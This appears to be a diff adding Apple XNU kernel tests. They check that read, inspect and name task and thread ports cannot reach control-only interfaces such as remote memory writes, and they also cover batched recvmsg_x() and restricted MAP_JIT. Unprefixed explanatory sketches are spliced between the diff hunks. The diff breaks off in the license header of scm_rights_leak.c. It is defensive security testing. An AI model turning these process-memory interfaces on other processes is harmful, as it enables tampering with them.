+       kr = host_processor_set_priv(host, psets[0], &pset_priv);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "host_processor_set_priv");
+       for (size_t i = 0; i < pcnt; i++) {
+               mach_port_deallocate(mach_task_self(), psets[i]);
+       }
+       mach_port_deallocate(mach_task_self(), host);
+
+       kr = processor_set_tasks_with_flavor(pset_priv, flavor, &taskList, &tcnt);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "processor_set_tasks_with_flavor");
+       T_QUIET; T_ASSERT_GE(tcnt, 1, "should have at least 1 task");
+       mach_port_deallocate(mach_task_self(), pset_priv);
+
+       for (size_t i = 0; i < tcnt; i++) {
+               kr = mach_port_kernel_object(mach_task_self(), taskList[i], &kotype, &kaddr);
+               if (kr == KERN_INVALID_RIGHT) {
+                       /* task port is inactive */
+                       T_LOG("task port name 0x%x is inactive", taskList[i]);
+                       continue;
+               } else if (kr) {
+                       T_FAIL("mach_port_kernel_object() failed with kr: 0x%x", kr);
+               }
+               switch (flavor) {
+               case TASK_FLAVOR_CONTROL:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_CONTROL, "TASK_FLAVOR_CONTROL should yield control ports");
+                       break;
+               case TASK_FLAVOR_READ:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_READ, "TASK_FLAVOR_READ should yield read ports");
+                       break;
+               case TASK_FLAVOR_INSPECT:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_INSPECT, "TASK_FLAVOR_INSPECT should yield inspect ports");
+                       break;
+               case TASK_FLAVOR_NAME:
+                       T_QUIET; T_EXPECT_EQ(kotype, IKOT_TASK_NAME, "TASK_FLAVOR_NAME should yield name ports");
+                       break;
+               default:
+                       T_FAIL("strange flavor");
+                       break;
+               }
+       }
+
+       for (size_t i = 0; i < tcnt; i++) {
+               mach_port_deallocate(mach_task_self(), taskList[i]);
+       }
+}
+
+static void
+test_task_port_mig_intrans(
+       task_t  tport,
+       task_flavor_t   flavor)
+{
+       kern_return_t kr;
+
+       T_LOG("Testing various MIG/manual intrans task interfaces with task flavor %d", flavor);
+
+       {
+               /* 1. Test some control port interfaces */
+               int data = 0x41;
+               int new_value = 0x42;
+               kr = mach_vm_write(tport,
+                   (mach_vm_address_t)&data,
+                   (vm_offset_t)&new_value,
+                   (mach_msg_type_number_t)sizeof(int));
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "mach_vm_write");
+
+               /* mach_vm_remap_new with max_protection VM_PROT_WRITE | VM_PROT_READ */
+               int *localAddress = 0;
+               mach_vm_address_t localMachVMAddress = 0;
+               vm_prot_t cur_protection = VM_PROT_WRITE | VM_PROT_READ;
+               vm_prot_t max_protection = VM_PROT_WRITE | VM_PROT_READ;
+               /* rdar://67706101 (mach_vm_remap flag that allows restricting protection of remapped region) */
+               kr = mach_vm_remap_new(mach_task_self(),
+                   &localMachVMAddress,
+                   sizeof(int),
+                   0,
+                   VM_FLAGS_ANYWHERE,
+                   tport, /* remote task, use self task port */
+                   (mach_vm_address_t)&data,
+                   false,
+                   &cur_protection,
+                   &max_protection,
+                   VM_INHERIT_NONE);
+               localAddress = (int *)(uintptr_t)localMachVMAddress;
+
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "mach_vm_remap_new - VM_PROT_WRITE");
+               if (KERN_SUCCESS == kr) {
+                       T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ | VM_PROT_WRITE, NULL);
+                       T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ | VM_PROT_WRITE, NULL);
+                       T_QUIET; T_EXPECT_EQ(*localAddress, data, NULL); /* read */
+                       *localAddress = 0; /* write */
+               }
+
+               exception_mask_t masks[EXC_TYPES_COUNT] = {};
+               mach_msg_type_number_t nmasks = 0;
+               exception_port_t ports[EXC_TYPES_COUNT] = {};
+               exception_behavior_t behaviors[EXC_TYPES_COUNT] = {};
+               thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {};
+               kr = task_get_exception_ports(tport, EXC_MASK_ALL,
+                   masks, &nmasks, ports, behaviors, flavors);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_CONTROL, "task_get_exception_ports");
+               for (size_t i = 0; i < EXC_TYPES_COUNT; i++) {
+                       mach_port_deallocate(mach_task_self(), ports[i]);
+               }
+       }
+
+       {
+               /* 2. Test some read port interfaces */
+               vm_offset_t read_value = 0;
+               mach_msg_type_number_t read_cnt = 0;
+               int data = 0x41;
+               kr = mach_vm_read(tport,
+                   (mach_vm_address_t)&data,
+                   (mach_msg_type_number_t)sizeof(int),
+                   &read_value,
+                   &read_cnt);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_read");
+
+               /* mach_vm_remap_new with max_protection VM_PROT_READ */
+               int *localAddress = 0;
+               mach_vm_address_t localMachVMAddress = 0;
+               vm_prot_t cur_protection = VM_PROT_READ;
+               vm_prot_t max_protection = VM_PROT_READ;
+               /* rdar://67706101 (mach_vm_remap flag that allows restricting protection of remapped region) */
+               kr = mach_vm_remap_new(mach_task_self(),
+                   &localMachVMAddress,
+                   sizeof(int),
+                   0,
+                   VM_FLAGS_ANYWHERE,
+                   tport, /* remote task, use self task port */
+                   (mach_vm_address_t)&data,
+                   false,
+                   &cur_protection,
+                   &max_protection,
+                   VM_INHERIT_NONE);
+               localAddress = (int *)(uintptr_t)localMachVMAddress;
+
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_remap_new - VM_PROT_READ");
+               if (KERN_SUCCESS == kr) {
+                       T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ, NULL);
+                       T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ, NULL);
+                       T_QUIET; T_EXPECT_EQ(*localAddress, data, NULL); /* read */
+               }
+
+               /* mach_vm_remap_new with copy == TRUE */
+               int data2 = 0x42;
+               localAddress = 0;
+               localMachVMAddress = 0;
+               cur_protection = VM_PROT_WRITE | VM_PROT_READ;
+               max_protection = VM_PROT_WRITE | VM_PROT_READ;
+
+               kr = mach_vm_remap_new(mach_task_self(),
+                   &localMachVMAddress,
+                   sizeof(int),
+                   0,
+                   VM_FLAGS_ANYWHERE,
+                   tport, /* remote task, use self task port */
+                   (mach_vm_address_t)&data2,
+                   true,
+                   &cur_protection,
+                   &max_protection,
+                   VM_INHERIT_NONE);
+               localAddress = (int *)(uintptr_t)localMachVMAddress;
+
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_vm_remap_new - copy==TRUE");
+               if (KERN_SUCCESS == kr) {
+                       T_QUIET; T_EXPECT_EQ(max_protection, VM_PROT_READ | VM_PROT_WRITE, NULL);
+                       T_QUIET; T_EXPECT_EQ(cur_protection, VM_PROT_READ | VM_PROT_WRITE, NULL);
+                       /* Following is causing bus error tracked by rdar://71616700 (Unexpected BUS ERROR in mach_vm_remap_new()) */
+                       // T_QUIET; T_EXPECT_EQ(*localAddress, data2, NULL); /* read */
+                       // *localAddress = 0; /* write */
+               }
+
+               /* task_get_mach_voucher */
+               mach_port_t voucher = MACH_PORT_NULL;
+               kr = task_get_mach_voucher(tport, 0, &voucher);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "task_get_mach_voucher");
+               mach_port_deallocate(mach_task_self(), voucher);
+
+               /* mach_port_space_info */
+               ipc_info_space_t space_info;
+               ipc_info_name_array_t table;
+               mach_msg_type_number_t tableCount;
+               ipc_info_tree_name_array_t tree; /* unused */
+               mach_msg_type_number_t treeCount; /* unused */
+               kr = mach_port_space_info(tport, &space_info, &table, &tableCount, &tree, &treeCount);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_READ, "mach_port_space_info");
+       }
+
+       {
+               /* 3. Test some inspect port interfaces */
+               task_exc_guard_behavior_t exc_behavior;
+               kr = task_get_exc_guard_behavior(tport, &exc_behavior);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_INSPECT, "task_get_exc_guard_behavior");
+       }
+
+       {
+               /* 4. Test some name port interfaces */
+               struct task_basic_info info;
+               mach_msg_type_number_t size = sizeof(info);
+               kr = task_info(tport,
+                   TASK_BASIC_INFO,
+                   (task_info_t)&info,
+                   &size);
+               RESULT_CHECK(kr, flavor, TASK_FLAVOR_NAME, "task_info");
+       }
+}
+
+static void
+test_thread_port_mig_intrans(
+       thread_t  tport,
+       thread_flavor_t   flavor)
+{
+       kern_return_t kr;
+
+       T_LOG("Testing various MIG/manual intrans thread interfaces with thread flavor %d", flavor);
+
+       {
+               /* 1. Test some control port interfaces */
+               exception_mask_t masks[EXC_TYPES_COUNT] = {};
+               mach_msg_type_number_t nmasks = 0;
+               exception_port_t ports[EXC_TYPES_COUNT] = {};
+               exception_behavior_t behaviors[EXC_TYPES_COUNT] = {};
+               thread_state_flavor_t flavors[EXC_TYPES_COUNT] = {};
+               kr = thread_get_exception_ports(tport, EXC_MASK_ALL,
+                   masks, &nmasks, ports, behaviors, flavors);
+               RESULT_CHECK(kr, flavor, THREAD_FLAVOR_CONTROL, "thread_get_exception_ports");
+               for (size_t i = 0; i < EXC_TYPES_COUNT; i++) {
+                       mach_port_deallocate(mach_task_self(), ports[i]);
+               }
+       }
+
+       {
+               /* 2. Test some read port interfaces */
+               mach_voucher_t voucher = MACH_PORT_NULL;
+               kr = thread_get_mach_voucher(tport, 0, &voucher);
+               RESULT_CHECK(kr, flavor, THREAD_FLAVOR_READ, "thread_get_mach_voucher");
+               mach_port_deallocate(mach_task_self(), voucher);
+       }
+
+       {
+               /* 3. Test some inspect port interfaces */
+               processor_set_name_t name = MACH_PORT_NULL;
+               kr = thread_get_assignment(tport, &name);
+               RESULT_CHECK(kr, flavor, THREAD_FLAVOR_INSPECT, "thread_get_assignment");
+               mach_port_deallocate(mach_task_self(), name);
+       }
+}
+
+static void
+test_get_child_task_port(void)
+{
+       pid_t child_pid;
+       kern_return_t kr;
+       mach_port_name_t tr, ti, tp, tn;
+
+       child_pid = fork();
+
+       T_LOG("Testing getting child task ports");
+
+       if (child_pid < 0) {
+               T_FAIL("fork failed in test_get_child_task_port.");
+       }
+
+       if (child_pid == 0) {
+               /* hang the child */
+               while (1) {
+                       sleep(10);
+               }
+       }
+
+       kr = task_for_pid(mach_task_self(), child_pid, &tp);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_for_pid for child %u", child_pid);
+
+       kr = task_read_for_pid(mach_task_self(), child_pid, &tr);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_read_for_pid for child %u", child_pid);
+
+       kr = task_inspect_for_pid(mach_task_self(), child_pid, &ti);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_inspect_for_pid for child %u", child_pid);
+
+       kr = task_name_for_pid(mach_task_self(), child_pid, &tn);
+       T_QUIET; T_EXPECT_MACH_SUCCESS(kr, "task_name_for_pid for child %u", child_pid);
+
+       mach_port_deallocate(mach_task_self(), tp);
+       mach_port_deallocate(mach_task_self(), tr);
+       mach_port_deallocate(mach_task_self(), ti);
+       mach_port_deallocate(mach_task_self(), tn);
+
+       kill(child_pid, SIGKILL);
+       int status;
+       wait(&status);
+}
+
+T_DECL(read_inspect, "Test critical read and inspect port interfaces")
+{
+       mach_port_t control_port, movable_port, read_port, inspect_port, name_port;
+       mach_port_t th_control_port, th_movable_port, th_read_port, th_inspect_port;
+#define TASK_PORT_COUNT 5
+#define THREAD_PORT_COUNT 4
+       mach_port_t task_ports[TASK_PORT_COUNT];
+       task_flavor_t task_flavors[TASK_PORT_COUNT];
+       mach_port_t thread_ports[THREAD_PORT_COUNT];
+       thread_flavor_t thread_flavors[THREAD_PORT_COUNT];
+       kern_return_t kr;
+
+       /* first, try getting all flavors of task port for self */
+       kr = task_for_pid(mach_task_self(), getpid(), &control_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_for_pid()");
+       task_ports[0] = control_port;
+       task_flavors[0] = TASK_FLAVOR_CONTROL;
+
+       kr = task_get_special_port(mach_task_self(), TASK_KERNEL_PORT, &movable_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_get_special_port(..TASK_KERNEL_PORT..)");
+       task_ports[1] = movable_port;
+       task_flavors[1] = TASK_FLAVOR_CONTROL;
+
+       kr = task_read_for_pid(mach_task_self(), getpid(), &read_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_read_for_pid()");
+       task_ports[2] = read_port;
+       task_flavors[2] = TASK_FLAVOR_READ;
+
+       kr = task_inspect_for_pid(mach_task_self(), getpid(), &inspect_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_inspect_for_pid()");
+       task_ports[3] = inspect_port;
+       task_flavors[3] = TASK_FLAVOR_INSPECT;
+
+       kr = task_name_for_pid(mach_task_self(), getpid(), &name_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "task_name_for_pid()");
+       task_ports[4] = name_port;
+       task_flavors[4] = TASK_FLAVOR_NAME;
+
+
+       for (size_t i = 0; i < TASK_PORT_COUNT; i++) {
+               /*
+                * 1. Make sure we can't get higher-privileged ports from lower ones
+                * through task_get_special_port()
+                */
+               test_task_get_special_port(task_ports[i], task_flavors[i]);
+
+               /*
+                * 2. Make sure the correct flavor of thread ports is returned from task_threads()
+                */
+               test_task_threads(task_ports[i], task_flavors[i]);
+
+               /*
+                * 3. Make sure the correct flavor of task ports is returned from processor_set_tasks()
+                */
+               if (i >= 1) {
+                       test_processor_set_tasks(task_flavors[i]);
+               }
+
+               /*
+                * 4. Make sure our MIG intrans enforcement for tasks does not break.
+                */
+               test_task_port_mig_intrans(task_ports[i], task_flavors[i]);
+       }
+
+
+       for (size_t i = 0; i < TASK_PORT_COUNT; i++) {
+               mach_port_deallocate(mach_task_self(), task_ports[i]);
+       }
+
+       /* 4. Spawn a child and get its task ports */
+       test_get_child_task_port();
+
+       /* Now, test thread read/inspect ports */
+       th_control_port = mach_thread_self();
+       thread_ports[0] = th_control_port;
+       thread_flavors[0] = THREAD_FLAVOR_CONTROL;
+
+       kr = thread_get_special_port(th_control_port, THREAD_KERNEL_PORT, &th_movable_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_KERNEL_PORT..)");
+       thread_ports[1] = th_movable_port;
+       thread_flavors[1] = THREAD_FLAVOR_CONTROL;
+
+       kr = thread_get_special_port(th_control_port, THREAD_READ_PORT, &th_read_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_READ_PORT..)");
+       thread_ports[2] = th_read_port;
+       thread_flavors[2] = THREAD_FLAVOR_READ;
+
+       kr = thread_get_special_port(th_control_port, THREAD_INSPECT_PORT, &th_inspect_port);
+       T_QUIET; T_ASSERT_MACH_SUCCESS(kr, "thread_get_special_port(..THREAD_INSPECT_PORT..)");
+       thread_ports[3] = th_inspect_port;
+       thread_flavors[3] = THREAD_FLAVOR_INSPECT;
+
+
+       for (size_t i = 0; i < THREAD_PORT_COUNT; i++) {
+               /*
+                * 1. Make sure we can't get higher-privileged ports from lower ones
+                * through thread_get_special_port()
+                */
+               test_thread_get_special_port(thread_ports[i], thread_flavors[i]);
+
+               /*
+                * 2. Make sure our MIG intrans enforcement for threads does not break.
+                */
+               test_thread_port_mig_intrans(thread_ports[i], thread_flavors[i]);
+       }
+
+       for (size_t i = 0; i < THREAD_PORT_COUNT; i++) {
+               mach_port_deallocate(mach_task_self(), thread_ports[i]);
+       }
+}
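
For reference, a minimal standalone sketch of the flavor model the read_inspect test exercises: a read-flavor task port obtained with task_read_for_pid() should be rejected by control-only MIG routines such as task_suspend(). The explicit prototype below is an assumption made so the sketch is self-contained (the tests above get it from their SDK headers), and the exact error code returned is deliberately not asserted.

/*
 * Sketch only: call a control-only interface on a read-flavor task port and
 * print the result.  task_read_for_pid() is assumed to be exposed by the SDK,
 * as it is for the tests above.
 */
#include <mach/mach.h>
#include <mach/mach_error.h>
#include <stdio.h>
#include <unistd.h>

extern kern_return_t task_read_for_pid(mach_port_name_t target, int pid, mach_port_name_t *tr);

int
main(void)
{
        mach_port_name_t read_port = MACH_PORT_NULL;
        kern_return_t kr = task_read_for_pid(mach_task_self(), getpid(), &read_port);
        if (kr != KERN_SUCCESS) {
                fprintf(stderr, "task_read_for_pid: %s\n", mach_error_string(kr));
                return 1;
        }
        /* task_suspend() requires a control port, so it is expected to fail here. */
        kr = task_suspend(read_port);
        printf("task_suspend on a read port -> %s\n", mach_error_string(kr));
        mach_port_deallocate(mach_task_self(), read_port);
        return 0;
}
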
diff --git a/tests/recvmsg_x_test.c b/tests/recvmsg_x_test.c
new file mode 100644 (file)
index 0000000..fb86f46
--- /dev/null
@@ -0,0 +1,216 @@
+/*
+ * Copyright (c) 2020 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
+ * http://www.opensource.apple.com/apsl/ and read it before using this file.
+ *
+ * The Original Code and all software distributed under the License are
+ * distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
+ * EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
+ * INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
+ * FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
+ * Please see the License for the specific language governing rights and
+ * limitations under the License.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_END@
+ */
+
+/* -*- compile-command: "xcrun --sdk iphoneos.internal make recvmsg_x_test" -*- */
+
+
+#include <sys/errno.h>
+#include <sys/fcntl.h>
+#include <sys/socket.h>
+#include <netinet/in.h>
+#include <stdbool.h>
+#include <err.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sysexits.h>
+#include <unistd.h>
+
+#include <darwintest.h>
+#include <darwintest_utils.h>
+
+#define NMSGS       5
+#define BUFFERLEN   1000
+
+T_GLOBAL_META(T_META_NAMESPACE("xnu.net"));
+
+static void
+sendPackets(int s, struct sockaddr *dst, unsigned int numMsg, size_t bufferLen)
+{
+       ssize_t count = 0;
+       struct msghdr msg = {};
+       struct iovec vec = {};
+       char *bytes = calloc(1, bufferLen);
+       if (bytes == NULL) {
+               err(EX_OSERR, "calloc()");
+       }
+
+       vec.iov_base = bytes;
+       vec.iov_len = bufferLen;
+
+       msg.msg_name = (void *)dst;
+       msg.msg_namelen = dst->sa_len;
+       msg.msg_iov = &vec;
+       msg.msg_iovlen = 1;
+       msg.msg_flags = 0;
+
+       for (unsigned int i = 0; i < numMsg; i++) {
+               ssize_t n;
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(n = sendmsg(s, &msg, 0), "sendmsg()");
+               T_LOG("Sent %ld bytes\n", n);
+               count += 1;
+       }
+
+       // Wait a bit to make sure the packets reach the receiver
+       usleep(100000);
+
+       T_LOG("Sent %ld packets\n", count);
+
+       free(bytes);
+}
+
+static void
+recvPackets_x(int s, unsigned int numMsg, size_t buflen, socklen_t cmsgLen)
+{
+       struct msghdr_x *msgList;
+       struct sockaddr_in *srcAddrs;
+       struct iovec *vec;
+       char *buffers;
+       char *cmsgBuf;
+
+       T_QUIET; T_ASSERT_NOTNULL(msgList = calloc(numMsg, sizeof(struct msghdr_x)), "msgList calloc()");
+       T_QUIET; T_ASSERT_NOTNULL(srcAddrs = calloc(numMsg, sizeof(struct sockaddr_in)), "srcAddrs calloc()");
+       T_QUIET; T_ASSERT_NOTNULL(vec = calloc(numMsg, sizeof(struct iovec)), "vec calloc()");
+       T_QUIET; T_ASSERT_NOTNULL(buffers = calloc(numMsg, buflen), "buffers calloc()");
+       T_QUIET; T_ASSERT_NOTNULL(cmsgBuf = calloc(numMsg, ALIGN(cmsgLen)), "cmsgBuf calloc()");
+
+       u_int count = 0;
+       while (true) {
+               /*
+                * Wrap around when we've exhausted the list
+                */
+               if ((count % numMsg) == 0) {
+                       for (unsigned int i = 0; i < numMsg; i++) {
+                               struct msghdr_x *msg = &msgList[i];
+                               msg->msg_name = &srcAddrs[i];
+                               msg->msg_namelen = sizeof(srcAddrs[i]);
+                               vec[i].iov_base = buffers + (i * buflen);
+                               vec[i].iov_len = buflen;
+                               msg->msg_iov = &vec[i];
+                               msg->msg_iovlen = 1;
+                               msg->msg_control = cmsgBuf + (i * ALIGN(cmsgLen));
+                               msg->msg_controllen = cmsgLen;
+                               msg->msg_flags = 0;
+
+                               T_QUIET; T_EXPECT_TRUE((uintptr_t)msg->msg_control % sizeof(uint32_t) == 0, NULL);
+                       }
+               }
+
+               ssize_t n = recvmsg_x(s, msgList + (count % numMsg), numMsg - (count % numMsg), 0);
+               if (n < 0) {
+                       if (errno == EINTR) {
+                               T_LOG("recvmsg_x(): %s", strerror(errno));
+                               continue;
+                       }
+                       if (errno == EWOULDBLOCK) {
+                               T_LOG("recvmsg_x(): %s", strerror(errno));
+                               break;
+                       }
+                       T_FAIL("recvmsg_x() failed: %s", strerror(errno));
+               }
+               T_LOG("recvmsg_x returned %ld packets\n", n);
+
+               for (unsigned int i = count; i < count + (u_int)n; i++) {
+                       struct msghdr_x *msg = &msgList[i % numMsg];
+
+                       T_LOG("Received packet #%d %lu bytes with recvmsg_x(), msg_namelen = %u, msg_controllen = %d -> %d, msg_flags = 0x%x\n",
+                           i + 1, msg->msg_datalen, msg->msg_namelen, cmsgLen, msg->msg_controllen, msg->msg_flags);
+
+                       struct cmsghdr *cmsg;
+
+                       for (cmsg = CMSG_FIRSTHDR(msg); cmsg; cmsg = CMSG_NXTHDR(msg, cmsg)) {
+                               T_QUIET; T_EXPECT_TRUE((uintptr_t)cmsg % sizeof(uint32_t) == 0, NULL);
+
+                               T_LOG("level = %d, type = %d, length = %d\n", cmsg->cmsg_level, cmsg->cmsg_type, cmsg->cmsg_len);
+                       }
+               }
+
+               count += (u_int)n;
+       }
+
+       free(msgList);
+       free(srcAddrs);
+       free(vec);
+       free(buffers);
+       free(cmsgBuf);
+}
+
+T_DECL(recvmsg_x_test, "exercise recvmsg_x() with various parameters")
+{
+       struct sockaddr_in addr = {
+               .sin_len = sizeof(addr),
+               .sin_family = AF_INET,
+               .sin_addr.s_addr = htonl(0x7f000001),
+               .sin_port = 0
+       };
+
+       int recvSocket;
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(recvSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), "socket()");
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(bind(recvSocket, (const struct sockaddr *)&addr, sizeof(addr)), "bind()");
+
+       socklen_t addrLen = sizeof(addr);
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(getsockname(recvSocket, (struct sockaddr *)&addr, &addrLen), "getsockname()");
+
+       int one = 1;
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(setsockopt(recvSocket, IPPROTO_IP, IP_RECVPKTINFO, (void *)&one, sizeof(one)), "setsockopt(IP_RECVPKTINFO)");
+
+       int flags = fcntl(recvSocket, F_GETFL, 0);
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(fcntl(recvSocket, F_SETFL, flags | O_NONBLOCK), "fcntl()");
+
+       int sendSocket;
+       T_QUIET; T_EXPECT_POSIX_SUCCESS(sendSocket = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP), "sendSocket socket()");
+
+       for (int dontTrunc = 0; dontTrunc <= 1; dontTrunc++) {
+               T_QUIET; T_EXPECT_POSIX_SUCCESS(setsockopt(recvSocket, SOL_SOCKET, SO_DONTTRUNC, (void *)&dontTrunc, sizeof(dontTrunc)), "setsockopt(SO_DONTTRUNC)");
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN, 50);
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN * 2, 50);
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN / 2, 50);
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN, 10);
+
+               T_LOG("\n================= recvmsg_x() test =================\n");
+               sendPackets(sendSocket, (struct sockaddr *)&addr, NMSGS, BUFFERLEN);
+               recvPackets_x(recvSocket, NMSGS, BUFFERLEN / 2, 10);
+       }
+
+       close(sendSocket);
+       close(recvSocket);
+
+       T_LOG("\n================= PASS =================\n");
+}
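
A compact sketch of the batched-receive pattern the test above drives: each struct msghdr_x describes one datagram slot, and recvmsg_x() returns how many of those slots were filled. The struct msghdr_x definition and the recvmsg_x() wrapper are assumed to be visible through this SDK's <sys/socket.h>, as they are for the test; the batch size of 4 is arbitrary.

/*
 * Sketch only: receive up to 4 UDP datagrams with a single system call.
 * Returns the number of messages received, or -1 on error.
 */
#include <string.h>
#include <sys/socket.h>
#include <sys/uio.h>

#define BATCH 4
#define BUFSZ 1024

static ssize_t
recv_batch(int s)
{
        static char bufs[BATCH][BUFSZ];
        struct iovec iov[BATCH];
        struct msghdr_x msgs[BATCH];

        memset(msgs, 0, sizeof(msgs));
        for (int i = 0; i < BATCH; i++) {
                iov[i].iov_base = bufs[i];
                iov[i].iov_len = BUFSZ;
                msgs[i].msg_iov = &iov[i];
                msgs[i].msg_iovlen = 1;
        }
        return recvmsg_x(s, msgs, BATCH, 0);
}

The test above additionally varies the per-slot buffer length and control-message length, and toggles SO_DONTTRUNC, to exercise the truncation paths.
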
diff --git a/tests/restrict_jit.c b/tests/restrict_jit.c
new file mode 100644 (file)
index 0000000..d7f824e
--- /dev/null
@@ -0,0 +1,33 @@
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/sysctl.h>
+#include <sys/mman.h>
+
+#include <darwintest.h>
+
+
+/*
+ * macOS only test. Try to map 2 different MAP_JIT regions. 2nd should fail.
+ */
+T_DECL(restrict_jit, "macOS restricted JIT entitlement test")
+{
+#if TARGET_OS_OSX
+       void *addr1;
+       void *addr2;
+       size_t size = 64 * 1024;
+
+
+       addr1 = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
+       T_ASSERT_NE_PTR(addr1, MAP_FAILED, "First map MAP_JIT");
+
+       addr2 = mmap(NULL, size, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
+       if (addr2 == MAP_FAILED) {
+               T_PASS("Only one MAP_JIT was allowed");
+       } else {
+               T_FAIL("Second MAP_JIT was allowed");
+       }
+
+#else
+       T_SKIP("Not macOS");
+#endif
+}
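
The test above only checks that a second MAP_JIT region is refused under the restricted-JIT entitlement. For context, a hedged sketch of how a single MAP_JIT region is typically used on Apple silicon follows; pthread_jit_write_protect_np() and sys_icache_invalidate() are standard SDK calls, and the entitlement requirement referenced is the plist added in the next file.

/*
 * Sketch only: populate and execute from a MAP_JIT region.  Assumes the
 * process carries a JIT entitlement (see restrict_jit.entitlements below).
 */
#include <libkern/OSCacheControl.h>
#include <pthread.h>
#include <string.h>
#include <sys/mman.h>

static void *
jit_copy_code(const void *code, size_t len)
{
        void *region = mmap(NULL, len, PROT_READ | PROT_WRITE | PROT_EXEC,
            MAP_ANON | MAP_PRIVATE | MAP_JIT, -1, 0);
        if (region == MAP_FAILED) {
                return NULL;
        }
        pthread_jit_write_protect_np(0);        /* this thread: region writable */
        memcpy(region, code, len);
        pthread_jit_write_protect_np(1);        /* this thread: region executable */
        sys_icache_invalidate(region, len);     /* flush stale instructions */
        return region;
}
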
diff --git a/tests/restrict_jit.entitlements b/tests/restrict_jit.entitlements
new file mode 100644 (file)
index 0000000..f9b25e2
--- /dev/null
@@ -0,0 +1,12 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
+<plist version="1.0">
+<dict>
+       <key>dynamic-codesigning</key>
+       <true/>
+       <key>com.apple.security.cs.allow-jit</key>
+       <true/>
+       <key>com.apple.security.cs.single-jit</key>
+       <true/>
+</dict>
+</plist>
diff --git a/tests/scm_rights_leak.c b/tests/scm_rights_leak.c
new file mode 100644 (file)
index 0000000..ac549b0
--- /dev/null
@@ -0,0 +1,108 @@
+/*
+ * Copyright (c) 2021 Apple Inc. All rights reserved.
+ *
+ * @APPLE_OSREFERENCE_LICENSE_HEADER_START@
+ *
+ * This file contains Original Code and/or Modifications of Original Code
+ * as defined in and that are subject to the Apple Public Source License
+ * Version 2.0 (the 'License'). You may not use this file except in
+ * compliance with the License. The rights granted to you under the License
+ * may not be used to create, or enable the creation or redistribution of,
+ * unlawful or unlicensed copies of an Apple operating system, or to
+ * circumvent, violate, or enable the circumvention or violation of, any
+ * terms of an Apple operating system software license agreement.
+ *
+ * Please obtain a copy of the License at
